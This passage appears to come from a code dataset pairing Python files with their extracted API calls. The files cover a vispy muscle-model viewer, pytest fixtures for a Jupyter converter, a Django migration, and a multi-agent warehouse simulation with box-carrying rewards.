aBox.set_gl_state('translucent', cull_face=False,depth_test=False)
#if(obj in markerDict):
# v=trimesh.load(objPath+obj, process=False).vertices #use this library because it preserve the order of vertex
# v*=0.01
# for tup in markerDict[obj]:
# vertexIndex,markerName=tup #markerDict[obj][i]
# markerPosition.append(v[vertexIndex,:])
# print(obj,markerName,vertexIndex,v[vertexIndex,:])
#else:
# print(obj)
humanJointPositionList=np.stack(humanJointPositionList)
humanJointMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=humanJointPositionList,face_color='green')
humanJointMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
boxCenterList=np.stack(boxCenterList)
boxCenterMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=boxCenterList,face_color='red')
boxCenterMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
###################### marker position ######################
'''
markerPosition=[] #np.zeros([markerCount,3]) #global frame
finalMarkerDict=pickle.load(open(dataFolder+"markerPosition.pkl",'rb')) #processed from 01 genTemplateMarkerPosition
for markerName in finalMarkerDict:
markerPosition.append(finalMarkerDict[markerName])
markerPosition=np.stack(markerPosition)
markerMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=markerPosition,face_color='orange')
markerMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
'''
###################################################################
muscles = parse(dataFolder+"muscle284.xml").getElementsByTagName('Unit')
wp=[]
muscleColor=[]
indexPair=[]
random.seed(a=0)
for e in muscles:
name=e.getAttribute('name')
f0=e.getAttribute('f0')
lm=e.getAttribute('lm')
lt=e.getAttribute('lt')
pen_angle=e.getAttribute('pen_angle')
lmax=e.getAttribute('lmax')
#print(name)
#Random a bright color
while True:
cr=random.random()
cg=random.random()
cb=random.random()
if(max([cr,cg,cb])>0.3):
break
for i,w in enumerate(e.getElementsByTagName('Waypoint')):
belongTo=w.getAttribute('body')
p=np.array(floatList(w.getAttribute('p'))) #*
#print(belongTo,p)
pMod=scaleMatDict[belongTo] @ homo(p)
wp.append(pMod[:3])
muscleColor.append([cr,cg,cb,1.0])
if(i>0):
indexPair.append([len(wp)-2,len(wp)-1])
#aLine=scene.visuals.Line(parent=view.scene,pos=wp,width=1,connect='strip',color='yellow') # method='agg'
#aLine.set_gl_state('translucent', cull_face=False,depth_test=True)
wp=np.stack(wp)
muscleColor=np.stack(muscleColor)
allLine=scene.visuals.Line(parent=view.scene,pos=wp,color=muscleColor,width=1,connect=np.array(indexPair))
allLine.set_gl_state('translucent', cull_face=False,depth_test=True)
'''
################# BVH ####################################
bvhMultiplier=0.01
with open(bvhPath+'SNFAT_walking.bvh') as f:
mocap = Bvh(f.read())
rootName='Character1_Hips'
rootOffset=np.array([float(e) for e in next(mocap.root.filter('ROOT'))['OFFSET']])*bvhMultiplier
rootOffset=humanJointPositionList[0,:] #np.zeros(3) #hack
#turn everything I need to dict of dict
s={
'':{
'parent':'',
'relOffset':np.zeros(3), #relative offset from parent joint
'absOffset':np.zeros(3) #absolute offset in rest pose (T-pose)
},
rootName:{
'parent':'',
'relOffset':rootOffset,
'absOffset':rootOffset,
}}
bvhJointList=mocap.get_joints_names()
print(bvhJointList)
for p in bvhJointList:
s[p]['children']=[str(e).split(' ',1)[1] for e in mocap.joint_direct_children(p)]
for c in s[p]['children']:
relativeOffset=np.array(mocap.joint_offset(c))*bvhMultiplier
s[c]={
'parent':p,
'relOffset':relativeOffset,
'absOffset':s[p]['absOffset']+relativeOffset,
}
bvhJointPosition=np.zeros([len(bvhJointList),3])
for i,p in enumerate(bvhJointList):
bvhJointPosition[i,:]=s[p]['absOffset']
#print(p,s[p]['absOffset'])
if('RIGMESH' in p):
bvhJointPosition[i,:]=0
#print(bvhJointPosition)
bvhMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=bvhJointPosition,face_color='blue')
bvhMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
'''
#=================================
rightPanel=QWidget()
gbox = QtWidgets.QGridLayout()
testButton=QPushButton()
testButton.setText("test")
gbox.addWidget(testButton,0,1)
def test():
#sk.set_data(connect=np.array([[0,1],[0,2],[0,3]],dtype=int))
print('click')
testButton.clicked.connect(test)
rightPanel.setLayout(gbox)
splitter=QtWidgets.QSplitter(QtCore.Qt.Horizontal)
splitter.addWidget(canvas.native) #add canvas to splitter
splitter.addWidget(rightPanel)
win.setCentralWidget(splitter) #add splitter to main window
#========================
#========================
win.show()
appQt.exec_()
|
[
"vispy.scene.visuals.Mesh",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QPushButton",
"numpy.ones",
"vispy.scene.visuals.Markers",
"PyQt5.QtWidgets.QApplication",
"numpy.diag",
"vispy.scene.SceneCanvas",
"vispy.scene.visuals.XYZAxis",
"PyQt5.QtWidgets.QWidget",
"random.seed",
"numpy.stack",
"PyQt5.QtWidgets.QMainWindow",
"vispy.scene.visuals.Box",
"random.random",
"vispy.io.read_mesh",
"xml.dom.minidom.parse",
"numpy.array",
"PyQt5.QtWidgets.QSplitter"
] |
[((1039, 1071), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (1061, 1071), False, 'from PyQt5 import QtWidgets, QtCore\n'), ((1079, 1092), 'PyQt5.QtWidgets.QMainWindow', 'QMainWindow', ([], {}), '()\n', (1090, 1092), False, 'from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider\n'), ((1161, 1174), 'vispy.scene.SceneCanvas', 'SceneCanvas', ([], {}), '()\n', (1172, 1174), False, 'from vispy.scene import SceneCanvas\n'), ((1438, 1478), 'vispy.scene.visuals.XYZAxis', 'scene.visuals.XYZAxis', ([], {'parent': 'view.scene'}), '(parent=view.scene)\n', (1459, 1478), False, 'from vispy import scene\n'), ((2042, 2073), 'xml.dom.minidom.parse', 'parse', (["(dataFolder + 'human.xml')"], {}), "(dataFolder + 'human.xml')\n", (2047, 2073), False, 'from xml.dom.minidom import parse\n'), ((4451, 4483), 'numpy.stack', 'np.stack', (['humanJointPositionList'], {}), '(humanJointPositionList)\n', (4459, 4483), True, 'import numpy as np\n'), ((4501, 4601), 'vispy.scene.visuals.Markers', 'scene.visuals.Markers', ([], {'parent': 'view.scene', 'size': '(8)', 'pos': 'humanJointPositionList', 'face_color': '"""green"""'}), "(parent=view.scene, size=8, pos=humanJointPositionList,\n face_color='green')\n", (4522, 4601), False, 'from vispy import scene\n'), ((4689, 4712), 'numpy.stack', 'np.stack', (['boxCenterList'], {}), '(boxCenterList)\n', (4697, 4712), True, 'import numpy as np\n'), ((4729, 4818), 'vispy.scene.visuals.Markers', 'scene.visuals.Markers', ([], {'parent': 'view.scene', 'size': '(8)', 'pos': 'boxCenterList', 'face_color': '"""red"""'}), "(parent=view.scene, size=8, pos=boxCenterList,\n face_color='red')\n", (4750, 4818), False, 'from vispy import scene\n'), ((5625, 5641), 'random.seed', 'random.seed', ([], {'a': '(0)'}), '(a=0)\n', (5636, 5641), False, 'import random\n'), ((6604, 6616), 'numpy.stack', 'np.stack', (['wp'], {}), '(wp)\n', (6612, 6616), True, 'import numpy as np\n'), 
((6629, 6650), 'numpy.stack', 'np.stack', (['muscleColor'], {}), '(muscleColor)\n', (6637, 6650), True, 'import numpy as np\n'), ((8371, 8380), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (8378, 8380), False, 'from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider\n'), ((8389, 8412), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', ([], {}), '()\n', (8410, 8412), False, 'from PyQt5 import QtWidgets, QtCore\n'), ((8427, 8440), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (8438, 8440), False, 'from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider\n'), ((8669, 8710), 'PyQt5.QtWidgets.QSplitter', 'QtWidgets.QSplitter', (['QtCore.Qt.Horizontal'], {}), '(QtCore.Qt.Horizontal)\n', (8688, 8710), False, 'from PyQt5 import QtWidgets, QtCore\n'), ((3221, 3248), 'vispy.io.read_mesh', 'io.read_mesh', (['(objPath + obj)'], {}), '(objPath + obj)\n', (3233, 3248), False, 'from vispy import io\n'), ((3492, 3607), 'vispy.scene.visuals.Mesh', 'scene.visuals.Mesh', ([], {'parent': 'view.scene', 'vertices': 'verts', 'shading': '"""flat"""', 'faces': 'faces', 'color': '(0.8, 0.8, 0.8, 0.2)'}), "(parent=view.scene, vertices=verts, shading='flat', faces\n =faces, color=(0.8, 0.8, 0.8, 0.2))\n", (3510, 3607), False, 'from vispy import scene\n'), ((3748, 3863), 'vispy.scene.visuals.Box', 'scene.visuals.Box', ([], {'parent': 'view.scene', 'width': 'size[0]', 'depth': 'size[1]', 'height': 'size[2]', 'color': '(0.8, 0.1, 0.1, 0.2)'}), '(parent=view.scene, width=size[0], depth=size[1], height=\n size[2], color=(0.8, 0.1, 0.1, 0.2))\n', (3765, 3863), False, 'from vispy import scene\n'), ((2486, 2513), 'numpy.diag', 'np.diag', (['scaleMatDict[name]'], {}), '(scaleMatDict[name])\n', (2493, 2513), True, 'import numpy as np\n'), ((5528, 5563), 'xml.dom.minidom.parse', 'parse', (["(dataFolder + 'muscle284.xml')"], {}), "(dataFolder + 'muscle284.xml')\n", (5533, 5563), 
False, 'from xml.dom.minidom import parse\n'), ((5925, 5940), 'random.random', 'random.random', ([], {}), '()\n', (5938, 5940), False, 'import random\n'), ((5952, 5967), 'random.random', 'random.random', ([], {}), '()\n', (5965, 5967), False, 'import random\n'), ((5979, 5994), 'random.random', 'random.random', ([], {}), '()\n', (5992, 5994), False, 'import random\n'), ((6737, 6756), 'numpy.array', 'np.array', (['indexPair'], {}), '(indexPair)\n', (6745, 6756), True, 'import numpy as np\n'), ((3400, 3428), 'numpy.ones', 'np.ones', (['[1, verts.shape[0]]'], {}), '([1, verts.shape[0]])\n', (3407, 3428), True, 'import numpy as np\n')]
|
import os
from abc import ABC, abstractmethod
from difflib import Differ
from pprint import pprint
from subprocess import call
import pytest
FILE_NAME = "hello-world"
SITE_DIR = "docs"
PAGE_DIR = "_pages"
IMAGE_DIR = os.path.join("assets", "images")
class AbstractConfig(ABC):
@abstractmethod
@pytest.fixture
def args(self):
pass
@pytest.fixture
def app(self, args):
self._app.launch_instance(args)
@pytest.fixture
def command(self, args):
call(["jupyter", self._command] + args)
@pytest.fixture
def package(self, args):
call(["python", "-m", self._command] + args)
@pytest.fixture(autouse=True)
def cleanup(self):
self._app.clear_instance()
class Config(AbstractConfig): # skipcq: PYL-W0223
def test_file(self, output_file): # skipcq: PYL-R0201
assert output_file.check()
def test_image(self, image_dir): # skipcq: PYL-R0201
assert os.path.isdir(image_dir.strpath)
assert os.path.isfile(image_dir.join(FILE_NAME + "_4_0.png").strpath)
def test_header(self, file_contents, target_contents): # skipcq: PYL-R0201
try:
assert all(line in target_contents.header for line in file_contents.header)
except AssertionError:
print_diff(file_contents.header, target_contents.header)
raise
def test_body(self, file_contents, target_contents): # skipcq: PYL-R0201
try:
assert all(a == b for a, b in zip(file_contents.body, target_contents.body))
except AssertionError:
print_diff(file_contents.body, target_contents.body)
raise
def print_diff(test_lines, target_lines):
differ = Differ()
diff = differ.compare(test_lines, target_lines)
pprint(list(diff))
|
[
"difflib.Differ",
"os.path.isdir",
"pytest.fixture",
"subprocess.call",
"os.path.join"
] |
[((219, 251), 'os.path.join', 'os.path.join', (['"""assets"""', '"""images"""'], {}), "('assets', 'images')\n", (231, 251), False, 'import os\n'), ((647, 675), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (661, 675), False, 'import pytest\n'), ((1718, 1726), 'difflib.Differ', 'Differ', ([], {}), '()\n', (1724, 1726), False, 'from difflib import Differ\n'), ((498, 537), 'subprocess.call', 'call', (["(['jupyter', self._command] + args)"], {}), "(['jupyter', self._command] + args)\n", (502, 537), False, 'from subprocess import call\n'), ((596, 640), 'subprocess.call', 'call', (["(['python', '-m', self._command] + args)"], {}), "(['python', '-m', self._command] + args)\n", (600, 640), False, 'from subprocess import call\n'), ((955, 987), 'os.path.isdir', 'os.path.isdir', (['image_dir.strpath'], {}), '(image_dir.strpath)\n', (968, 987), False, 'import os\n')]
|
# Generated by Django 2.2.3 on 2019-07-23 21:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('database', '0016_auto_20190723_2107'),
]
operations = [
migrations.RemoveField(
model_name='useractionrel',
name='testimonial',
),
migrations.AddField(
model_name='userprofile',
name='profile_picture',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='database.Media'),
),
]
|
[
"django.db.migrations.RemoveField",
"django.db.models.ForeignKey"
] |
[((269, 339), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""useractionrel"""', 'name': '"""testimonial"""'}), "(model_name='useractionrel', name='testimonial')\n", (291, 339), False, 'from django.db import migrations, models\n'), ((497, 609), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.SET_NULL', 'to': '"""database.Media"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.SET_NULL, to='database.Media')\n", (514, 609), False, 'from django.db import migrations, models\n')]
|
import numpy as np
import copy
from memory_profiler import profile
# physical/external base state of all entites
def isNear(box,landmark,threshold=0.05):
if (np.sum(np.square(box.state.p_pos-landmark.state.p_pos)) <= threshold):
return True
else:
return False
def calcDistance(entity1,entity2):
return np.sqrt(np.sum(np.square(entity1.state.p_pos - entity2.state.p_pos)))
class EntityState(object):
def __init__(self):
# physical position
self.p_pos = None
# physical velocity
self.p_vel = None
# state of agents (including communication and internal/mental state)
class AgentState(EntityState):
def __init__(self):
super(AgentState, self).__init__()
# communication utterance
self.c = None
# action of the agent
class Action(object):
def __init__(self):
# physical action
self.u = None
# communication action
self.c = None
# pickup Action
self.pickup = False
# drop Action
self.drop = False
class Wall(object):
def __init__(self, orient='H', axis_pos=0.0, endpoints=(-1, 1), width=0.1,
hard=True):
# orientation: 'H'orizontal or 'V'ertical
self.orient = orient
# position along axis which wall lays on (y-axis for H, x-axis for V)
self.axis_pos = axis_pos
# endpoints of wall (x-coords for H, y-coords for V)
self.endpoints = np.array(endpoints)
# width of wall
self.width = width
# whether wall is impassable to all agents
self.hard = hard
# color of wall
self.color = np.array([0.0, 0.0, 0.0])
# properties and state of physical world entity
class Entity(object):
def __init__(self):
# index among all entities (important to set for distance caching)
self.i = 0
# name
self.name = ''
# properties:
self.size = 0.050
# entity can move / be pushed
self.movable = False
# entity collides with others
self.collide = True
# entity can pass through non-hard walls
self.ghost = False
# material density (affects mass)
self.density = 25.0
# color
self.color = None
# max speed and accel
self.max_speed = None
self.accel = None
# state
self.state = EntityState()
# mass
self.initial_mass = 1.0
@property
def mass(self):
return self.initial_mass
# properties of landmark entities
class Landmark(Entity):
def __init__(self):
super(Landmark, self).__init__()
# Properties of the load that we wish to carry
class LoadBox(Entity):
"""
The load boxes have to reach the corresponding landmarks
"""
def __init__(self):
super(LoadBox, self).__init__()
# Agent which will get reward once this task is done
self.agentAssigned = None
# Reward agent will get once the Box Reaches its target
self.rewardAssigned = None
# Determines whether any agent has picked up this box
self.pickedUp = False
# Agent which is handling this box
self.agentHandling = None
#Boxes are pickup but but do not collide
self.collide = False
# Distance of te
self.goalDistInit = None
#To store the previous state of goalDist of the Box
self.prevGoalDist = None
def farInit(self,landmark):
self.goalDistInit = calcDistance(self,landmark)
self.prevGoalDist = copy.deepcopy(self.goalDistInit)
def rewardDist(self,landmark,rewardMultiplier=2.0,negativeRewardMultiplier=-2.0,stagnantReward = -5.0, nearRewardConstant = 10.0):
threshold = 0.05
boxReached = isNear(self,landmark,threshold=threshold)
#! Heavily penalizing taking the box away
distancePrev = copy.deepcopy(self.prevGoalDist)
distanceNow = calcDistance(self,landmark)
#? Updating the goal distance in the memory
self.prevGoalDist = distanceNow
#! Rewarding negative if the box is stagnant
if distanceNow == distancePrev and not boxReached:
return stagnantReward
elif distanceNow == distancePrev and boxReached:
return nearRewardConstant
#! Rewarding negative if the box has been moved away from the target
# elif distanceNow > distancePrev:
# # print("Box Moved Away")
# return negativeRewardMultiplier*((distanceNow-distancePrev)/self.goalDistInit)
#How much is the box nearer to the goal compared to where it was initially
else:
return rewardMultiplier*(1.0-(distanceNow/self.goalDistInit))
# properties of agent entities
class Agent(Entity):
def __init__(self):
super(Agent, self).__init__()
#Names of Assigned Boxes
self.assignedBoxes = []
#Stores all of the boxes that the agent has handled on his way
self.extraBoxesHandled = []
# agents are movable by default
self.movable = True
# cannot send communication signals
self.silent = False
# cannot observe the world
self.blind = False
# is agent from a warehouse task
self.warehouse = False
# physical motor noise amount
self.u_noise = None
# communication noise amount
self.c_noise = None
# control range
self.u_range = 1.0
# state
self.state = AgentState()
# action
self.action = Action()
# script behavior to execute
self.action_callback = None
# multi-agent world
class World(object):
def __init__(self):
# list of agents and entities (can change at execution-time!)
self.agents = []
# list of all of the landmarks initialized
self.landmarks = []
self.walls = []
#To add the boxes that needs to be transported
self.boxes = []
#Reward Associated with the boxes
self.boxRewards = []
#Max number of agents expected
self.maxAgents = 5
#Max number of boxes expected
self.maxBoxes = 5
# communication channel dimensionality
self.dim_c = 0
# position dimensionality
self.dim_p = 2
# color dimensionality
self.dim_color = 3
# simulation timestep
self.dt = 0.1
# physical damping
self.damping = 0.25
# contact response parameters
self.contact_force = 1e+2
self.contact_margin = 1e-3
# cache distances between all agents (not calculated by default)
self.cache_dists = False
self.cached_dist_vect = None
self.cached_dist_mag = None
# return all entities in the world
@property
def entities(self):
return self.agents + self.boxes + self.landmarks
# return all agents controllable by external policies
@property
def policy_agents(self):
return [agent for agent in self.agents if agent.action_callback is None]
# return all agents controlled by world scripts
@property
def scripted_agents(self):
return [agent for agent in self.agents if agent.action_callback is not None]
#! We have not been using this distance which is being calculated every step
def calculate_distances(self):
if self.cached_dist_vect is None:
# initialize distance data structure
self.cached_dist_vect = np.zeros((len(self.entities),
len(self.entities),
self.dim_p))
# calculate minimum distance for a collision between all entities
self.min_dists = np.zeros((len(self.entities), len(self.entities)))
for ia, entity_a in enumerate(self.entities):
for ib in range(ia + 1, len(self.entities)):
entity_b = self.entities[ib]
min_dist = entity_a.size + entity_b.size
self.min_dists[ia, ib] = min_dist
self.min_dists[ib, ia] = min_dist
for ia, entity_a in enumerate(self.entities):
for ib in range(ia + 1, len(self.entities)):
entity_b = self.entities[ib]
delta_pos = entity_a.state.p_pos - entity_b.state.p_pos
self.cached_dist_vect[ia, ib, :] = delta_pos
self.cached_dist_vect[ib, ia, :] = -delta_pos
self.cached_dist_mag = np.linalg.norm(self.cached_dist_vect, axis=2)
self.cached_collisions = (self.cached_dist_mag <= self.min_dists)
def boxRewardCalc(self):
for i, box in enumerate(self.boxes):
self.boxRewards[i] = box.rewardDist(self.landmarks[i])
# update state of the world
def step(self):
# set actions for scripted agents
for agent in self.scripted_agents:
agent.action = agent.action_callback(agent, self)
# update boxes states
self.agent_pick_drop()
# Calculate all of the rewards
self.boxRewardCalc()
# gather forces applied to entities
p_force = [None] * len(self.entities)
# apply agent physical controls
p_force = self.apply_action_force(p_force)
# apply environment forces
p_force = self.apply_environment_force(p_force)
# integrate physical state
self.integrate_state(p_force)
# update agent state
for agent in self.agents:
self.update_agent_state(agent)
# calculate and store distances between all entities
if self.cache_dists:
self.calculate_distances()
def agent_pick_drop(self):
threshold = 0.25
busy_agents = []
# Caculating agents which are busy in carrying boxes
for box in self.boxes:
if box.agentHandling:
busy_agents.append(box.agentHandling)
# Dropping the boxes and removing the respective agents from busy_list
for i, agent in enumerate(self.agents):
# TODO if the agent is stationary only then he can put down the box
if agent.action.drop:
for box in self.boxes:
if box.agentHandling == agent.name: # and (np.linalg.norm(agent.state.p_vel) < 0.5):
agent.color = agent.color + np.ones(agent.color.size)*.5
busy_agents.remove(box.agentHandling)
box.movable = False
box.pickedUp = False
box.agentHandling = None
box.state.p_pos = copy.deepcopy(agent.state.p_pos)
box.state.p_vel = np.zeros(self.dim_p)
break
# TODO better assignment needs to be done (Agent will pick up the box which is most close to him, meanwhile box will be picked up by the agent which is closest)
for box in self.boxes:
closest_agent = []
for agent in self.agents:
# If agent already has one box with him, he can't pickup another one
if agent.name in busy_agents: # or (np.linalg.norm(agent.state.p_vel) > 0.5):
continue
# If agent is in threshold distance he is in competition to pickup the box
# TODO if agent is stationary only then he can pick up the box
if agent.action.pickup and calcDistance(agent,box) <= threshold:
dist = calcDistance(agent,box)
closest_agent.append((dist, agent))
# Select the closest among all agents in threshold distance
if len(closest_agent) > 0:
closest_agent.sort()
#! changing the color of the agent with the box on him
closest_agent[0][1].color = closest_agent[0][1].color - np.ones(agent.color.size)*.5
busy_agents.append(closest_agent[0][1].name)
#? If this box is an extra work that the agent is doing then
if box.name not in closest_agent[0][1].assignedBoxes and box.name not in closest_agent[0][1].extraBoxesHandled:
# print("{} picked extra {}".format(closest_agent[0][1].name,box.name))
closest_agent[0][1].extraBoxesHandled.append(box.name)
box.movable = True
box.pickedUp = True
box.agentHandling = closest_agent[0][1].name
box.state.p_pos = copy.deepcopy(closest_agent[0][1].state.p_pos) ## ISSUE of assignment(temporary fix using deepcopy)
box.state.p_vel = copy.deepcopy(closest_agent[0][1].state.p_vel) ## ISSUE of assignment(temporary fix using deepcopy)
# gather agent action forces
def apply_action_force(self, p_force):
# set applied forces
for i,agent in enumerate(self.agents):
if agent.movable:
noise = np.random.randn(*agent.action.u.shape) * agent.u_noise if agent.u_noise else 0.0
p_force[i] = (agent.mass * agent.accel if agent.accel is not None else agent.mass) * agent.action.u + noise
# apply forces to the pickedup boxes
for i,box in enumerate(self.boxes):
if box.pickedUp:
assert box.agentHandling != None
agent_id = int(box.agentHandling.split(' ')[1])
total_force = p_force[agent_id]
p_force[agent_id] = total_force * (self.agents[agent_id].mass / (box.mass + self.agents[agent_id].mass))
p_force[i + len(self.agents)] = total_force * (box.mass / (box.mass + self.agents[agent_id].mass))
return p_force
# gather physical forces acting on entities
def apply_environment_force(self, p_force):
# simple (but inefficient) collision response
for a,entity_a in enumerate(self.entities):
for b,entity_b in enumerate(self.entities):
if(b <= a): continue
[f_a, f_b] = self.get_collision_force(entity_a, entity_b)
if(f_a is not None):
if(p_force[a] is None): p_force[a] = 0.0
p_force[a] = f_a + p_force[a]
if(f_b is not None):
if(p_force[b] is None): p_force[b] = 0.0
p_force[b] = f_b + p_force[b]
if entity_a.movable:
for wall in self.walls:
wf = self.get_wall_collision_force(entity_a, wall)
if wf is not None:
if p_force[a] is None:
p_force[a] = 0.0
p_force[a] = p_force[a] + wf
return p_force
# integrate physical state
def integrate_state(self, p_force):
# Compute pairs of boxes and agents
pairs = {}
for i,box in enumerate(self.boxes):
if box.agentHandling:
agent_id = int(box.agentHandling.split(' ')[1])
pairs[agent_id] = len(self.agents) + i
pairs[len(self.agents) + i] = agent_id
# Update the state by taking damping anf forces applied in account
for i,entity in enumerate(self.entities):
if not entity.movable: continue
entity.state.p_vel = entity.state.p_vel * (1 - self.damping)
if i in pairs.keys():
if (p_force[i] is not None):
if (p_force[pairs[i]] is not None):
net_force = p_force[i] + p_force[pairs[i]]
else:
net_force = p_force[i]
else:
if (p_force[pairs[i]] is not None):
net_force = p_force[pairs[i]]
else:
net_force = 0
net_mass = entity.mass + self.entities[pairs[i]].mass
entity.state.p_vel += (net_force / net_mass) * self.dt
else:
if (p_force[i] is not None):
entity.state.p_vel += (p_force[i] / entity.mass) * self.dt
# set max allowed speed to minimum of max allowed speed of box and agent
if i in pairs.keys():
if self.entities[pairs[i]].max_speed is not None:
if entity.max_speed is not None:
max_speed = min(self.entities[pairs[i]].max_speed, entity.max_speed)
else:
max_speed = self.entities[pairs[i]].max_speed
else:
max_speed = entity.max_speed
else:
max_speed = entity.max_speed
if max_speed is not None:
speed = np.sqrt(np.square(entity.state.p_vel[0]) + np.square(entity.state.p_vel[1]))
if speed > entity.max_speed:
entity.state.p_vel = entity.state.p_vel / np.sqrt(np.square(entity.state.p_vel[0]) +
np.square(entity.state.p_vel[1])) * entity.max_speed
entity.state.p_pos += entity.state.p_vel * self.dt
def update_agent_state(self, agent):
# set communication state (directly for now)
if agent.silent:
agent.state.c = np.zeros(self.dim_c)#! Message state is directly set hmmmm if silent
else:
noise = np.random.randn(*agent.action.c.shape) * agent.c_noise if agent.c_noise else 0.0
agent.state.c = agent.action.c + noise
# get collision forces for any contact between two entities
def get_collision_force(self, entity_a, entity_b):
if (not entity_a.collide) or (not entity_b.collide):
return [None, None] # not a collider
if (not entity_a.movable) and (not entity_b.movable):
return [None, None] # neither entity moves
if (entity_a is entity_b):
return [None, None] # don't collide against itself
if isinstance(entity_a, Agent) and isinstance(entity_b, LoadBox):
if entity_b.pickedUp and (entity_b.agentHandling == entity_a.name):
return [None, None] # agent don't collide with object if it is carrying it
if self.cache_dists:
delta_pos = self.cached_dist_vect[ia, ib]
dist = self.cached_dist_mag[ia, ib]
dist_min = self.min_dists[ia, ib]
else:
# compute actual distance between entities
delta_pos = entity_a.state.p_pos - entity_b.state.p_pos
dist = np.sqrt(np.sum(np.square(delta_pos)))
# minimum allowable distance
dist_min = entity_a.size + entity_b.size
# softmax penetration
k = self.contact_margin
penetration = np.logaddexp(0, -(dist - dist_min)/k)*k
force = self.contact_force * delta_pos / dist * penetration
if entity_a.movable and entity_b.movable:
# consider mass in collisions
force_ratio = entity_b.mass / entity_a.mass
force_a = force_ratio * force
force_b = -(1 / force_ratio) * force
else:
force_a = +force if entity_a.movable else None
force_b = -force if entity_b.movable else None
return [force_a, force_b]
# get collision forces for contact between an entity and a wall
def get_wall_collision_force(self, entity, wall):
if entity.ghost and not wall.hard:
return None # ghost passes through soft walls
if wall.orient == 'H':
prll_dim = 0
perp_dim = 1
else:
prll_dim = 1
perp_dim = 0
ent_pos = entity.state.p_pos
if (ent_pos[prll_dim] < wall.endpoints[0] - entity.size or
ent_pos[prll_dim] > wall.endpoints[1] + entity.size):
return None # entity is beyond endpoints of wall
elif (ent_pos[prll_dim] < wall.endpoints[0] or
ent_pos[prll_dim] > wall.endpoints[1]):
# part of entity is beyond wall
if ent_pos[prll_dim] < wall.endpoints[0]:
dist_past_end = ent_pos[prll_dim] - wall.endpoints[0]
else:
dist_past_end = ent_pos[prll_dim] - wall.endpoints[1]
theta = np.arcsin(dist_past_end / entity.size)
dist_min = np.cos(theta) * entity.size + 0.5 * wall.width
else: # entire entity lies within bounds of wall
theta = 0
dist_past_end = 0
dist_min = entity.size + 0.5 * wall.width
# only need to calculate distance in relevant dim
delta_pos = ent_pos[perp_dim] - wall.axis_pos
dist = np.abs(delta_pos)
# softmax penetration
k = self.contact_margin
penetration = np.logaddexp(0, -(dist - dist_min)/k)*k
force_mag = self.contact_force * delta_pos / dist * penetration
force = np.zeros(2)
force[perp_dim] = np.cos(theta) * force_mag
force[prll_dim] = np.sin(theta) * np.abs(force_mag)
return force
|
[
"copy.deepcopy",
"numpy.abs",
"numpy.random.randn",
"numpy.square",
"numpy.zeros",
"numpy.arcsin",
"numpy.ones",
"numpy.sin",
"numpy.linalg.norm",
"numpy.array",
"numpy.logaddexp",
"numpy.cos"
] |
[((1463, 1482), 'numpy.array', 'np.array', (['endpoints'], {}), '(endpoints)\n', (1471, 1482), True, 'import numpy as np\n'), ((1655, 1680), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (1663, 1680), True, 'import numpy as np\n'), ((3590, 3622), 'copy.deepcopy', 'copy.deepcopy', (['self.goalDistInit'], {}), '(self.goalDistInit)\n', (3603, 3622), False, 'import copy\n'), ((3948, 3980), 'copy.deepcopy', 'copy.deepcopy', (['self.prevGoalDist'], {}), '(self.prevGoalDist)\n', (3961, 3980), False, 'import copy\n'), ((8676, 8721), 'numpy.linalg.norm', 'np.linalg.norm', (['self.cached_dist_vect'], {'axis': '(2)'}), '(self.cached_dist_vect, axis=2)\n', (8690, 8721), True, 'import numpy as np\n'), ((20909, 20926), 'numpy.abs', 'np.abs', (['delta_pos'], {}), '(delta_pos)\n', (20915, 20926), True, 'import numpy as np\n'), ((21139, 21150), 'numpy.zeros', 'np.zeros', (['(2)'], {}), '(2)\n', (21147, 21150), True, 'import numpy as np\n'), ((171, 220), 'numpy.square', 'np.square', (['(box.state.p_pos - landmark.state.p_pos)'], {}), '(box.state.p_pos - landmark.state.p_pos)\n', (180, 220), True, 'import numpy as np\n'), ((348, 400), 'numpy.square', 'np.square', (['(entity1.state.p_pos - entity2.state.p_pos)'], {}), '(entity1.state.p_pos - entity2.state.p_pos)\n', (357, 400), True, 'import numpy as np\n'), ((17528, 17548), 'numpy.zeros', 'np.zeros', (['self.dim_c'], {}), '(self.dim_c)\n', (17536, 17548), True, 'import numpy as np\n'), ((19008, 19047), 'numpy.logaddexp', 'np.logaddexp', (['(0)', '(-(dist - dist_min) / k)'], {}), '(0, -(dist - dist_min) / k)\n', (19020, 19047), True, 'import numpy as np\n'), ((21011, 21050), 'numpy.logaddexp', 'np.logaddexp', (['(0)', '(-(dist - dist_min) / k)'], {}), '(0, -(dist - dist_min) / k)\n', (21023, 21050), True, 'import numpy as np\n'), ((21177, 21190), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (21183, 21190), True, 'import numpy as np\n'), ((21229, 21242), 'numpy.sin', 'np.sin', (['theta'], {}), 
